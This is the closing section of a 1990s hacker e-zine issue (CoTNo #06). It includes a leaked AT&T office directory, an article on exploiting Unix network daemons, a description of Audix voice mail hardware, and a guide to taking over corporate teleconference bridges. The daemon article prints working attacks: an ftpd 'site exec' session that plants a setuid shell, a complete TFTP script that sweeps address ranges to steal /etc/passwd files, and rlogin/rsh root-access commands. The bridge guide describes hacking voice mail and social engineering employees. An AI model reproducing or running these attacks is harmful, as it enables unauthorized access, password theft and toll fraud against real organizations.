702-239-7015 AT&T ENVIRON SAFETY 32 AVE. OF AMERICAS NEW YORK NY 10013 212-219-6396 AT&T-NYC 22 CORTLANDT ST. NEW YORK NY 10017 212-393-9800 550 MADISON AVE. NEW YORK NY 10022 212-605-5500 NS ONE PENN PLAZA SUITE 5420 NEW YORK NY 10119 212-714-5900 AT&T 2 MANHATTANVILLE RD. PURCHASE NY 10577 914-251-0700 SUFFERN MMC 22 HEMION RD. SUFFERN NY 10901 914-577-6600 AT&T 520 BROAD HOLLOW RD. MELVILLE NY 11747 516-420-3000 ALBANY 11 26 AVIATION RD. ALBANY NY 12205 518-489-4615 AT&T 16 CORPORATE WOODS BLVD. ALBANY NY 12211 518-447-6900 AT&T 2 JEFFERSON PLAZA, FLR 2 POUGHKEPSE NY 12601 914-485-7744 AT&T MARKETING 6597 KINNE RD SYRACUSE NY 13214 315-445-3800 AT&T 300 PEARL ST. OLYMPIA TOWERS BUFFALO NY 14202 716-849-6000 BUFFALO INSTALL. 25 JOHN GLENN DR. AMHERST NY 14228 716-691-2711 AT&T 1 MARINE MIDLAND PLZ. ROCHESTER NY 14604 716-777-4400 CET 5151 BLAZER MEM. PKWY DUBLIN OH 43017 614-764-5454 COLUMBUS WORKS 6200 E. BROAD ST. COLUMBUS OH 43213 614-860-2000 AT&T ONE SEAGATE, SUITE 750 TOLEDO OH 43604 419-245-3700 AT&T-NS 55 ERIEVIEW PLAZA 4TH FL. CLEVELAND OH 44114 216-664-6500 ADP 7007 E. PLEASANT VALLEY INDEPNDNCE OH 44131 216-447-1980 NAT'L ACCOUNT 1 FIRST NAT'L PLAZA DAYTON OH 44502 513-449-7800 AT&T 7725 W. RENO AVE. OK. CITY OK 73126 405-491-3000 AT&T LGE BUS. MACHINES 2020 S.W. 4TH AVE. PORTLAND OR 97201 503-295-5000 AT&T MICROELECT 1220 SW GREENBURGH RD PORTLAND OR 97223 503-244-3883 AT&T COMMERCE CT. 4 STATION SQ. SUITE 770 PITTSBURGH PA 15219 412-338-4800 AT&T 4 GATEWAY CTR. SUITE 500 PITTSBURGH PA 15222 412-392-8200 AT&T 470 STREETS RUN RD. PITTSBURGH PA 15236 412-882-1845 HARRISBURG 2080 LINGLESTOWN RD. HARRISBURG PA 17110 717-540-7251 ALLENTOWN-BETHLEHEM 2255 AVE. A BETHLEHEM PA 18018 215-861-2700 AT&T-BL STC RT 222 BREINIGSVL PA 18103 215-391-2000 AT&T MICROELECT. 961 MARCON BLVD. ALLENTOWN PA 18103 215-266-2900 ALLENTOWN-BL 1247 SO. CEDAR CREST BLVD. ALLENTOWN PA 18103 215-770-2200 AT&T 1 IMPERIAL WAY 2ND FL. ALLENTOWN PA 18195 215-398-5800 AT&T 3 BALA PLAZA WEST BLDG. BALA CYNWD PA 19004 215-581-2400 AT&T 514 KAISER DR. FOLCROFT PA 19032 215-724-5250 AT&T 1800 JFK BLVD., SUITE 1300 PHILADELPH PA 19103 215-972-1300 KING OF PRUSSIA 601 ALLENDALE RD. KING OF PR PA 19406 215-768-2600 READING WORKS 2525 N. 12TH ST. READING PA 19604 215-939-7011 AT&T NASSAU RECYCLE 4201 W. COLUMBIA CASEY SC 29033 803-796-4720 AT&T 1201 MAIN ST. 22ND FL. COLUMBIA SC 29201 803-733-3800 AT&T 111 WESTWOOD PL. 3RD FL. BRENTWOOD TN 37027 615-377-4000 AT&T MICROELECT. 195 POLK AVE. NASHVILLE TN 37211 615-749-8222 AT&T REPAIR CTR 653 MAINSTREAM DR. NASHVILLE TN 37228 615-242-1950 NASHVILLE MSL 566 MAINSTREAM DR. NASHVILLE TN 37228 615-256-4111 AT&T 9041 EXECUTIVE PARK KNOXVILLE TN 37923 615-690-3400 AT&T-NS SALES 909 E.LAS COLINAS BLVD IRVING TX 75039 214-401-4700 DALLAS WORKS 3000 SKYLINE DRIVE MESQUITE TX 75149 214-284-2000 AT&T-NS 1201 MAIN ST. SUITE 2555 DALLAS TX 75202 214-745-4790 AT&T 5525 LBJ FREEWAY DALLAS TX 75240 214-308-2000 AT&T 2501 PARKVIEW DR., SUITE 200 FT.WORTH TX 76102 817-870-4400 AT&T-NS 2900 N. LOOP WEST HOUSTON TX 77092 713-956-4400 AT&T CITYVIEW 10999 IH 10 W SAN ANTON TX 78230 512-691-5700 AT&T 5444 S. STAPLES CORPUS CHR TX 78411 512-994-4400 AT&T 8911 CAP. OF TEX HGHWY AUSTIN TX 78759 512-343-3000 AT&T 415 WEST 8TH ST. SUITE 307 AMARILLO TX 79101 806-374-9435 AT&T-BMG 3000 N. GARFIELD SUITE 180 MIDLAND TX 79705 915-687-8700 AT&T-NS 10521 ROSEHAVEN ST. FAIRFAX VA 22030 703-352-0900 AT&T-NS 12450 FAIR LAKES CIRCLE FAIRFAX VA 22033 703-631-3288 AT&T-BELL LABS 1201 S. HAYES ST. ARLINGTON VA 22202 703-769-8900 AT&T 1550 WILSON BLVD. ARLINGTON VA 22209 703-247-4690 AT&T FED SYS 1201 S. HAYES ST. ARLINGTON VA 22209 703-685-8678 AT&T MAJOR MKT & SALES 600 EAST BROAD ST. RICHMOND VA 23219 804-775-3300 AT&T OSO 1530 E. RUN RD. RICHMOND VA 23228 804-262-4062 RICHMOND WORKS 4500 S. LABURNUM AVE. RICHMOND VA 23231 804-226-5000 AT&T 1338 PLANTATION RD NE ROANOKE VA 24012 703-344-1160 NEW RIVER VALLEY CALLER 21 RADFORD VA 24143 703-731-8000 AT&T 2901 THIRD AVE. SEATTLE WA 98121 206-443-7000 AT&T ACCT MGMT 2121 4TH AVE. SEATTLE WA 98121 206-728-4749 AT&T N. 9 POST SUITE 330 SPOKANE WA 99201 509-747-6110 AT&T 400 S. EXECUTIVE DR. BROOMFIELD WI 53005 414-785-9110 MILWAUKEE CP/ASSEM.CTR MILWAUKEE WI 53212 414-963-8200 AT&T 2802 INTERNAT'L LN, 2ND FLR MADISON WI 53704 608-241-8900 AT&T 900 PENNSYLVANIA AVE. CHARLESTON WV 25302 304-347-2000 MARTINSBURG MMC TABLER STA.RD. MARTINSBRG WV 25401 304-263-6931 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ And remember... All directory information is classified AT&T Proprietary and, as such, should be safeguarded as outlined in GEI 2.2. Responsibility for security is passed on to each employee receiving the directory. ========= Playing with the Internet Daemons by Voyager [TNO] Internet hosts communicate with each other using either TCP (Transmission Control Protocol) or UDP (User Datagram Protocol) on top of IP (Internet Protocol). Other protocols are used on top of IP, but TCP and UDP are the ones that are of interest to us. On a Unix system, the file /etc/protocols will list the available protocols on your machine On the Session Layer (OSI model) or the Internet Layer (DOD Protocol Model) data is moved between hosts by using ports. Each data communication will have a source port number and a destination port number. Port numbers can be divided into two types, well-known ports and dynamically allocated ports. Under Unix, well-known ports are defined in the file /etc/services. In addition, RFC (Request For Comments) 1700 "Assigned Numbers" provides a complete listing of all well-known ports. Dynamically allocated port numbers are assigned as needed by the system. Unix provides the ability to connect programs called daemons to well-known ports. The remote computer will connect to the well-known port on the host computer, and be connected to the daemon program. Daemon programs are traditionally started by inetd (The Internet Daemon). Daemon programs to be executed are defined in the inetd configuration file, /etc/inetd.conf. Most of these daemons run as a priveledged user, often as root. Many of these programs have vulnerabilities which can be exploited to gain access to remote systems. The daemons we are interested in are: Service Port Number Description ~~~~~~~~~~~~~ ~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ftp 21 File Transfer [Control] smtp 25 Simple Mail Transfer Protocol tftp 69 Trivial File Transfer Protocol finger 79 Finger www-http 80 World Wide Web HTTP sunrpc 111 SUN Remote Procedure Call fln-spx 221 Berkeley rlogind with SPX auth rsh-spx 222 Berkeley rshd with SPX auth netinfo 716-719 NetInfo ibm-res 1405 IBM Remote Execution Starter nfs 2049 Network File System x11 6000-6063 X Window System rcp/rshd Remote Copy/Remote Shell Daemon nis Network Information Services The next part of this article will focus on specific daemons and their known vulnerabilities. The vulnerabilities with brief explanations will be explained here. For the more complicated exploits, which are beyond the scope of a concise article, more research will be required on the part of the reader. --> ftp 21 File Transfer [Control] FTP is the File Transfer Protocol. FTP requests are answered by the FTP daemon, ftpd. wuarchive's ftpd versions below 2.2 have a vulnerability where you can execute any binary you can see with the 'site exec' command by calling it with a relative pathname with "../" at the beginning. Here is a sample exploit: Login to the system via ftp: 220 uswest.com FTP server (Version wu-2.1(1) ready. Name (uswest.com:waltman): waltman 331 Password required for waltman. Password: jim 230 User waltman logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> quote "site exec cp /bin/sh /tmp/.tno" 200-cp /bin/sh /tmp/tno ftp> quote "site exec chmod 6755 /tmp/.tno" 200-chmod 6755 /tmp/tno ftp> quit 221 Goodbye. --> smtp 25 Simple Mail Transfer Protocol Mail attacks are one of the oldest known methods of attacking Internet hosts. The most common mail daemon, and least secure, is sendmail. Other mail daemons include smail, MMDF,and IDA sendmail. Sendmail has had too many vulnerabilities to list them all. There is an entire FAQ written specifically on sendmail vulnerabilities, therefore we will not cover them heavily here. One well known vulnerability, useful only for historical purposes, is "Wizard Mode." In Wizard mode you could request a shell via Port 25 (The SMTP port). No modern system will be vulnerable to this attack. To exploit this vulnerability, you telnetted to port 25, typed WIZ to enter Wizard mode, and entered the password. The problem related to the way the encrypted password was stored. There was a bug that caused the system to believe that no password was as good as the real password. To quote Steven Bellovin: The intended behavior of wizard mode was that if you supplied the right password, some other non-standard SMTP commands were enabled, notably one to give you a shell. The hashed password -- one-way encrypted exactly as per /etc/passwd -- was stored in the sendmail configuration file. But there was this bug; to explain it, I need to discuss some arcana relating to sendmail and the C compiler. In order to save the expense of reading and parsing the configuration file each time, sendmail has what's known as a ``frozen configuration file''. The concept is fine; the implementation isn't. To freeze the configuration file, sendmail just wrote out to disk the entire dynamic memory area (used by malloc) and the `bss' area -- the area that took up no space in the executable file, but was initialized to all zeros by the UNIX kernel when the program was executed. The bss area held all variables that were not given explicit initial values by the C source. Naturally, when delivering mail, sendmail just read these whole chunks back in, in two giant reads. It was therefore necessary to store all configuration file information in the bss or malloc areas, which demanded a fair amount of care in coding. The wizard mode password was stored in malloc'ed memory, so it was frozen properly. But the pointer to it was explicitly set to NULL in the source: char *wiz = NULL; That meant that it was in the initialized data area, *not* the bss. And it was therefore *not* saved with the frozen configuration. So -- when the configuration file is parsed and frozen, the password is read, and written out. The next time sendmail is run, though, the pointer will be reset to NULL. (The password is present, of course, but there's no way to find it.) And the code stupidly believed in the concept of no password for the back door. One more point is worth noting -- during testing, sendmail did the right thing with wizard mode. That is, it did check the password -- because if you didn't happen to do the wizard mode test with a frozen configuration file -- and most testing would not be done that way, since you have to refreeze after each compilation -- the pointer would be correct. --> tftp 69 Trivial File Transfer Protocol tftp is the Trivial File Transfer Protocol. tftp is most often used to attempt to grab password files from remote systems. tftp attacks are so simple and repetitive that scripts are written to automate the process of attacking entire domains. Here is one such script: #!/bin/sh ######################################################################## # TFTP snagger by Yo # It snags /etc/passwd files from all hosts with open 69 (tftp) port. # scans all hosts from XX.XX.0.0 - XX.XX.255.255 # you can run it in the background in following way: # snag [hostname] > /dev/null & # [hostname] might be used IP # (with -ip option) as well as FQDN # Last Updated 10/20/92 # # Highly modified by ThePublic on 10/21/92 ######################################################################## case $1 in '') echo " Usage: $0 [hostname] to run in the foreground " echo " $0 [hostname] > /dev/null & to run in the background " echo " The [hostname] can be specialized in fully qualified domain name " echo " i.e.- $0 nyx.cs.du.edu - and it'll scan all du.edu domain. " echo " as well as IP with -ip option. " exit 1 ;; -ip) if [ $2x = x ]; then echo " Usage: $0 $1 the IP " exit 1 else x=`echo $2 | cut -d. -f1` xx=`echo $2 | cut -d. -f2` xxx=`echo $2 | cut -d. -f3` xxxx=`echo $2 | cut -d. -f4` # ^ field delimiter is '.' -- get field 1/2/3/4 fi;; *) if [ ! -f /usr/ucb/nslookup ] && [ ! -f /usr/local/bin/nslookup ]; then # -x is for SunOs echo sorry dude, no nslookup server .. try it with -ip option. exit 1 fi x1=`nslookup $1 | fgrep "Address" | cut -c11-17 | tail -1` # ^ 7 chars ^ last line if [ "$x1" = '' ]; then echo " There is no such domain. Nothing to scan. Exit. " exit 1 fi x=`echo $x1 | cut -d. -f1` # get the first set of #, ##, or ### xx=`echo $x1 | cut -d. -f2` # get the second set xxx=0 # ignore the rest, if any xxxx=0 ;; esac if [ $x -lt 1 ] || [ $x -ge 255 ] || [ $xx -lt 1 ] || [ $xx -ge 255 ]; then echo There is no such domain. Nothing to scan. exit 1 fi while [ $x -ne 255 ]; do while [ $xx -ne 255 ]; do while [ $xxx -ne 255 ]; do while [ $xxxx -ne 255 ]; do target=$x.$xx.$xxx.$xxxx trap "echo The Process was stopped at $target;rm -rf passwd.$target; exit 1" 2 tftp << EOF c $target mode ascii trace get /etc/passwd passwd.$target quit EOF if [ ! -s passwd.$target ] ; then rm -rf passwd.$target echo `date` $target has rejected an attempt >> .info else mv passwd.$target .good.$target echo `date` $target is taken, all data is stored in .good.$target file >> .info fi xxxx=`expr $xxxx + 1 ` done xxxx=0 xxx=`expr $xxx + 1 ` done xxx=0 xx=`expr $xx + 1 ` done xx=0 x=`expr $x + 1 ` done --> finger 79 Finger The finger command displays information about another user, such as login name, full name, terminal name, idle time, login time, and location if known. finger requests are answered by the fingerd daemon. Robert Tappan Morris's Internet Worm used the finger daemon. The finger daemon allowed up to 512 bytes from the remote machine as part of the finger request. fingerd, however, suffered from a buffer overflow bug caused by a lack proper bounds checking. Anything over 512 got interpreted by the machine being fingered as an instruction to be executed locally, with whatever privileges the finger daemon had. --> www-http 80 World Wide Web HTTP HTML (HyperText Markup Language) allows web page user to execute programs on the host system. If the web page designer allows the web page user to enter arguments to the commands, the system is vulnerable to the usual problems associated with system() type calls. In addition, there is a vulnerability that under some circumstances will give you an X-Term using the UID that the WWW server is running under. --> sunrpc 111 SUN Remote Procedure Call Sun RPC (Remote Procedure Call) allows users to execute procedures on remote hosts. RPC has suffered from a lack of secure authentification. To exploit RPC vulnerabilities, you should have a program called "ont" which is not terribly difficult to find. --> login 513 Remote login Some versions of AIX and Linux suffer from a bug in the way that rlogind reads arguments. To exploit this vulnerability, issue this command from a remote system: rlogin host -l -froot Where host is the name of the target machine and username is the username you would like to rlogin as (usully root). If this bug exists on the hosts system, you will be logged in, without being asked for a password. --> rsh-spx 222 Berkeley rshd with SPX auth Some versions of Dynix and Irix have a bug in rshd that allows you to run commands as root. To exploit this vulnerability, issue this command from the remote system: rsh host -l "" /bin/sh --> netinfo 716-719 NetInfo NeXT has implemented a protocol known as NetInfo so that one NeXT machine can query another NeXT machine for information. A NetInfo server will by default allow unrestricted access to system databases. This can be fixed by the System Administrator. One of the pieces of information netinfo will give up is the password file. --> ibm-res 1405 IBM Remote Execution Starter rexd (the remote execution daemon) allows you to execute a program on another Unix machine. AIX, NeXT and HPUX versions of rexd have suffered from a vulnerability allowing unintended remote execution. The rexd daemon checks your uid on the machine you are coming from, therefore you must be root on the machine you are mounting the rexd attack from. To determine if your target machine is running rexd, use the 'rcp -p ' command. You will also need the exploit program known as 'on' which is available on fine H/P boards everywhere. --> nfs 2049 Network File System NFS, the Network File System, from Sun Microsystems has suffered from multiple security vulnerabilities. In addition, many system administrators configure NFS incorrectly, allowing unintended remote access. Using the command 'showmount -e ' you can view what file systems are exported from a machine. Many administrators allow read access to the /etc directory, allowing you to copy the password file. Other administrators allow write access to user directories, allowing you to create .rhosts files and gain access to the machine via rlogin or rsh. In addition to configuration issues, NFS is vulnerable to attacks using a uid masking bug, a mknod bug, and a general file handle guessing attack. Several hacked versions of the mount command have been written to exploit known vulnerabilities. --> x11 6000-6063 X Window System X-Windows has suffered and currently suffers from numerous vulnerabilities. One vulnerability allows you to access another users display, another allows you to view another users keystrokes. Another vulnerability allows a remote attacker to run every program that the root user starts in his or her .xsession file. Yet another X-Windows vulnerability allows a local user to create a root entry in the /etc/passwd file. --> rcp The SunOS 4.0.x rcp utility can be exploited by any trusted host listed in /etc/hosts.equiv or /.rhosts. To exploit this hole you must be running NFS (Network File System) on a Unix system or PC/NFS on a DOS system. --> NIS Sun's NIS (Network Information Service) also known as yp (Yellow Pages) has a vulnerability where you can request an NIS map from another NIS domain if you know the NIS domain name of the target system. There is no way to query a remote system for it's NIS domainname, but many NIS domain names are easily guessable. The most popular NIS map to request is passwd.byname, the NIS implementation of /etc/passwd. In addition, if you have access to a diskless Unix workstation, you can determine the NIS domain name of the server it boots from. +--------------------------------------------------------+ + Do not confuse NIS domain names with DNS domain names! | +--------------------------------------------------------+ --> Other attacks In addition to these daemon based attacks, many other methods can be used to gain access to a remote computer. These include, but are not limited to: default accounts, password guessing, sniffing, source routing, DNS routing attacks, tcp sequence prediction and uucp configuration exploits. This should give you an idea on how daemon based attacks function. By no means is this a complete list of security vulnerabilities in privileged internet daemons. To discover more information about how these daemons operate, and how to exploit their vulnerabilities, I highly recommend reading source code, man pages and RFC's. Voyager[TNO] ========= [][][][][][][][][][][][][][][][][][][][][][] [[[ ]]] [[[[ THE DEFINITY AUDIX VMS INSIDE OUT ]]]] [[[[[ ]]]]] [[[[[[[ by: Boba Fett ]]]]]]] [[[[[[[[[[[ ]]]]]]]]]]] [][][][][][][][][][][][][][][][][][][][][][] - " What?! Another crummy file on the Audix voice mail? " Not exactly. In COTNO #1, you will find a good article on identifying and obtaining mailboxes on the Audix Voice Mail System (VMS). This paper will discuss the physical/electrical design of the Audix System and how it's integrated with the Definity switch. I will not discuss how to obtain dialups to the audix or hacking it, that's another file :). Most of the information and diagrams in this paper where gathered from various sources. Mainly, the AT&T Tech. Journal may/june 1994, and some very cooperative AT&T representatives. ;) 1) Hardware ----------- All right, what does this baby look like? Well, all in all, it's quite simple. There are 4 major components, all of which can be easily replaced or removed. A tape drive, a hard disk and 2 circuit boards. Here's what the Definity Audix's front panel looks like. Disk/Alarm board MFB panel .---------------------.__.-----. | _______________ | | | | | | | | o <----- Red LED | | | | | | | | ||| | | | O <---------- "Enter/yes" Button | | ||| | | | __ | Tape ----->| |||| | | | || | Unit | | |||| | | | || | | | ||| | | | || <----- Alphanumeric liquid | | ||| | | | || | crystal display(10 character) | | ||| | | | -- | | --------------- | | O <---- "Next/no" button | | | | | | | | Boot/ -----------------> O | | O <---- "Back" button shutdown | | |Back | button | .--------. | | | | | Some | | | | | | stupid | _ | | _ | | | warning| | | | | | <-------------- Handles/ | | label. | | | | | | | | / latch | |________| | <---------------- .________________|_|__|--|_|_|_| As you can see, it consists of two boards: The multifunction board (right), and the disk/alarm board (left). o MFB major components: - A 386 processor (supports Unix System V) with 16 megs of dynamic RAM (DRAM). - An array of six 50 mhz digital signal processors (DSPs). - The Definity switch time-division multiplexed (TDM) bus interface. - An alarm monitoring processor. :( o D/ALB major components: - A tape drive - A Hard Drive - An online modem for REMOTE ALARM NOTIFICATION, AND REMOTE MAINTENANCE. The modem is included with the package. If the on-board modem does not comply with the local telco rules (for example foreign countries) , than through the RS-232 port an external one can be attached. Let's take a deeper look inside and see where the components go. .--------------------------------------. /| + Disk/Alarm Board + |__Tip/Ring .--------. / | .------------------remote acs ports--|___RS-232 | | / | | | | | / | | .------|--------|--------Ethernet----- LAN |S | / | | | Tape System Disk controller| |W | / |_|__|_________________________________| |I |/ |-|--|---------------------------------| |T|======| | | | + Multifunction Board + | |C| Audix| | | | | |H|======| | | | /============== RS-232 | |\ | | SCSI 386 Serial Data Packet | |________| \ | | Interface CPU async/sync. bus |--- Packet \ | | -|-----------|-------|------inter- | Bus \ | | | 16 Meg DMA face | \ | Faceplate RAM | \ | | \ | & Control | \ TDM | \ | 3 DSP 32Cs---Interface|--- TD bus \______________________________________| o Explanation of some terms: CPU: Central Processing Unit DSP: Digital Signal Processor TDM: Time-Division Multiplexed DMA: Direct Memory Access SCSI: Small Computer System Interface The Definity Audix VMS is so compact because it has to fit in the Definity PBX's port slot. It can: detect a incoming call, detect when the caller has disconnected, disconnect a call on ANY port. It can also, disable any port to prevent it from receiving incoming calls, and most important of all, it can originate outgoing calls. It is also good to know that it has CLID. Here's a list of it's functions: - Call History Information (Called Party ID,Calling party ID and reason for call). - Integrated message waiting notification (LED). - Disconnect message (Contact Administrator for help, please disconnect goodbye). - Message waiting status information (Updated on activity, Audit of each vmb and refresh of all vmbs). - Maintenance info. for link. - Audix control of port. (disconnect call, detect caller, etc..) I've been referring to it as the Definity Audix, and not just Audix. Audix, (aka Audix release 1), was first introduced in 1984. The Definity Audix, however, was introduced in 1992, and came with a series of more advanced features. For example, the time scale modification option was improved, allowing the playback of messages at slower or faster speeds. Or the speech encoder/decoder algorithm which was changed resulting in better sound quality (so they say). How can you tell if it's a Definity when calling it remotely? Well, quite frankly I'm not sure. There is a way, however, it isn't very easy to apply. The Audix, release 1 system takes approx. 1 second to detect your DTMF tones. Now, the Definity, on the other hand, takes only about 25 milliseconds, less than half the time. You can time the reaction, and figure out what your dealing with, but there are many things that can affect the response time also (for example, the amount of people using the voice mail). As you can see this method isn't very reliable. 2) Software ----------- The system software resides on a single 160 meg casettee tape. It is loaded on the hard disk whenever an installation or upgrade is being performed. There is also a big part of the code, which constantly monitors multiple thermal sensors on the two circuit packs, making sure that they don't over heat. The chick's sweet voice you hear when interacting with the VMS, is composed of multiple fragments. A fragment can be a single word, a complete sentence, or a bunch of sentences. For example, "Please enter extension and pound sign" is most likely to be two fragments. The first being "please enter extension" and the second being "and pound sign". Obviously, this is used to save space. A second recording is: "Enter password and pound sign", the "and pound sign" is the same fragment as in the first one. Since AT&T sells it's Audix system in nearly 80 countries, there are a couple of different language tapes also. So don't be surprised if you encounter a Spanish or Japanese Audix VMS. Currently AT&T offers ten language tapes and the Definity Audix can support up to nine different language tapes simultaneously. "So if it's an Audix voice mail then there's a Definity PBX, right? " Wrong. Even though it fits the Definity PBX like a glove, it can be integrated with other switches. Some of the most common are: - G3I - System 25 - G3S - System 75 - G3R - System 85 I'm not sure about NorTel switches such as the SL-1, some people say yes, while others say that only AT&T switches can be integrated with Audix. If anyone knows, please let me know. Comments or suggestions are welcome. - Boba Fett <05/23/95> ========= /\ \/ Bridging the Gap /\-------------------------/\ \/-------------------------\/ Eddie Van Halen /\ \/ INTRODUCTION ------------ First of all I wrote this because for one thing I am SICK AND TIRED of sitting on irc and seeing "k0nPhiNf0!?" pumped through my terminal every five seconds. Then,once they get the k0nPh iNf0, I am forced to constantly hear from the k0nPh people about how "DiZ k0nPh sUx!". People give me k0nPh info all the time but I NEVER call into them. Why? Because these days,they DO suck. It seems the underground world have completely forgotten about what use to be the best way to conference - BRIDGE's. ABOUT BRIDGES ------------- I'm sure everyone reading this knows what a bridge is. Whether they know the best way to get them is another thing. I do, however, run across the occasional irc'er that /msgs me with "whats a bridge?" when I bring up the subject. Bridges are just about the same as k0nPhz, except they are usually owned and used by big businesses and schools on their own telephone equipment. This equipment is usually integrated into their voice mail and/or PBX computers and allows the company or school to hold teleconferences without relying on the national teleconference providers. For those out there (if any?) that remember the 904-348 bridge, it was a System 75 PBX bridge used by a home school, where the students would call in in the daytime and take tests and attend classes. The way it was used was as follows: You would dial 348-XX00 to 348-XX19. That was ONE of the bridges. Anybody that connected to any number from 00 to 19 would be connected to the bridge. If two people tried to connect to the same number, it would be busy. Thus, it had 20 lines. A second bridge was reached at 348-XX20 to 348-XX29. This was off the same system, but gave you a different bridge with 10 lines. Yet another bridge could be found at 348-XX30 to 348-XX69 off the same system. You could call in during the daytime and mess with the teachers and kids or whatever, but occasionally they would hang you up, or call you back or something. This one went down because it wasn't blocked from collect calls, and the number got very widespread throughout the k0d3lyN3 and BBS world and was constantly collect-called by lamers who didn't know how to phreak. It is, however, occasionally up for the students to use, but goes down as soon class is over. FINDING A BRIDGE. ----------------- Finding a bridge use to be the easiest thing for me. It used to be, like, WHAT I DID. I would put one up on my codeline, and spread it to the others, and would call into QSD or Lutz or something about 30 minutes afterward and get messages from people who I didn't even know saying "Hey,man,thanx for puttin up that bridge!". These days I don't even bother. I don't WANT to talk to half these idiots that are around today. Anyway, lets say you want to find a bridge. Go through the phonebook and look up the all the big businesses. Call the main numbers that you find after hours and find out which ones have voice mail systems. In this article, I will focus on the Audix voicemail system made by AT&T so look for those. To tell if your target is using Audix, press *8 during the greet, and if it says "Enter the four digit extension and pound sign." you have found one. A complete guide to hacking Audix voice mail can be found in CoTNo #1, article #1. Railroad companies like CSX and AT&T owned companies like Transtech, or Card Services often have Audix systems with bridges. Once you have the targeted Audix system,you need to start scanning for the system extensions. Hit *6 for the names directory and try entering CONFERENCE, BRIDGE, or TELE. You COULD possibly get the actual extension to the bridge spit out right at you (as with CSX's system),or at least most systems have that extension where you hear the person state their name "Conference Planning". If this is the case,you need to get a voice mail box off the system and send a message to whatever extension Conference Planning is saying something like "Yes, I need a conference set up for such and such a date & such and such a time". This will more than likely work and Conference Planning will respond usually with either "No problem, the teleconference bridge is at XXXX" or "All we need is the PIN number you want." However, a lot of systems do not have their *6 directory system configured very good at all, so you might want to try scanning all the XX00 and XX99 and find out where all the computer-related extensions are located at. Or you might want to social engineer it out of one of the people located at an extension. Try calling from within your box and acting like you work there. Once you have found what you think is the bridge,you need to test it out with a friend. If he calls into the same extension and gets a busy signal, you may want tell him to try the next extension up. If the bridge is multi-lined, have him figure out how many lines the bridge has and make sure the lines are all going to the same bridge and not 3 different bridges or something. Note that if you are scanning on a Railroad companies system, you will sometimes come to an extension you might think is a bridge and end up to be dispatchers. So once you sign on to what you believe is the bridge,hit a few dtmf tones and make sure you don't hear someone say "You done hittin funny buttons!!!" or "dispatcher,mike." SECURITY ON A BRIDGE. --------------------- Security on a bridge is a lot different than on an alliance or on a k0nPh. You usually don't have to worry about it getting cancelled and the bridge usually will not ever go down if you don't third-party or collect call to it. You are not dealing with the phone company here, you are dealing with whatever business owns it, and if they detect a lot of activity on the extension, they will usually either warn you to leave by recording the conversations and playing them back to you, or just change the extension. DO expect to be dealing with the business communication security person, though, at one time or another. They will usually talk to you and explain to you why they need you to leave, and most of the time I found out, it wasn't because of the people using their bridge, it was because of the collect- calling, third party billing or the fact that people were using it via the 800 number and the company was having to pick up the tab. I don't recommend finding a bridge and giving it to the entire world because when you are not on, you don't know what goes on in the conversation, and if the company does finally decide to get it investigated, the investigators seem to go after the same thing every time: the source that gave out the bridge in the first place. CONCLUSION ---------- Hopefully you have learned something from all this. With a little time and patience, you can set up a bridge that will last for weeks, maybe months. And besides, hacking out a phone system will teach you a lot more than than setting up a k0nPh off your neighbor's phone terminal. So next time you see someone flash "k0nPhiNf0!?", tell them to get off there ass and try hacking one out for a change. ========= Elite Music Part V - Disk Jockey/WR - Please note the /WR. Until now I have not been in textfiles at large, only a few given to good friends. There have been other `DJ's out there; as many as six by my count, so far. So even that my group has had but one member for over four years, I keep the tag to distinguish myself. Well, while on a (pretty lame, I must admit) conference with a barrage of lame people, sending streams of DTMF tones, long belches, humming, and music down the line, I got an idea. At one point the B-52's `Roam' was played in the background during a half-intelligent discussion of cellular telecommunications. These lyrics almost came to me almost immediately, and these are the results. I intend to record this song for real in a few months or so; I do have the instrumental of the real song and it would be somewhat fun to do. Maybe a .AU will be out there on the Web, sometime... and by that time these lame people might grow up. (But, I can't ask for everything.) "Phone Roam" Roam cyberspace, switching through every carrier Oh girl won't you lend me one of those codes Take it trunk to trunk, hopping through the satellites Around the world, the call flags switchboard lights Roam if you want to, roam around the world Roam if you want to, without codes, without cards Roam if you want to, roam around the world Roam if you want to, without anything but an ESN Hit conferences where you'll lose your mind Toners and lamers, leave them all behind Take it trunk to trunk, hopping through the satellites Around the world, the call flags switchboard lights Roam if you want to, roam around the world Roam if you want to, without codes, without cards Roam if you want to, roam around the world Roam if you want to, without anything but an ESN Go ahead and roam, go ahead and roam Scan all you can while the Feds trace you Hack up PBXs till your hands get tired Take it trunk to trunk, hopping through the satellites Around the world, the call flags switchboard lights Roam if you want to, roam around the world Roam if you want to, without codes, without cards Roam if you want to, roam around the world Roam if you want to, without anything but an ESN Take it trunk to trunk, hopping through the satellites Take it trunk to trunk, hopping through the satellites Take it trunk to trunk, hopping through the satellites Take it trunk to trunk, hopping through the satellites Take it trunk to trunk, hopping through the satellites Take it trunk to trunk, hopping through the satellites Go ahead and roam, go ahead and roam ========= End of CoTNo #06 I know you expect some snappy ending as usual to another successful issue of Communications of The New Order, but considering the grimness of much of this issue I don't think it would be appropriate. Despite all of the bad news that was presented in this issue, I hope that everyone will "keep the faith", as it were. Explore, learn, educate. But don't do anything stupid. The powers that be are becoming increasingly intent upon stopping those who are labeled as "hackers". And everyday, there are more of us for them to stop. Everyday, we are being introduced to new technologies that few people understand, and few people want to understand. Our desire to understand can be achieved, but we must be careful. Even though you just read this issue's Elite Music, I thought I would finish off with another song that has special significance to me. This showed up in my e-mail the other day and it really made me think. I hope it is as meaningful to you as it was for me... TNO MAN ------- To the Tune of Desperado, by The Eagles TNO man, why don't you come to your senses? You been out jumping' fences into those Bell yards. Oh you're a smart one, I know that you got your reasons, these things that are pleasin' can hurt you somehow. Don't you hack on those old .mil sites, they'll catch you if you're lazy, you know diverting twice is always your best bet. Now it seems to me some eleet things have been shown upon your screen but you only want the ones that you can't hack. TNO man, oh you ain't gettin' no younger, your hunger for knowledge, it's drivin' you on. And hacking, oh hacking, well that's just some people talkin', your prison is waitin' at the end of the line. Don't your power get old on the Internet? The account won't die and the root won't mind, it's hard to tell the night time from the day. You're losin' all your highs and lows, ain't it funny how the feelin' goes away? TNO man, why don't you come to your senses? Come down from your firewalls, open the gateway. It may be laming' but there's a job waiting for you. You better let somebody hire you LET SOMEBODY HIRE YOU you better let somebody hire you before it's too late. - Don Henley, Glenn Frey and the Voyager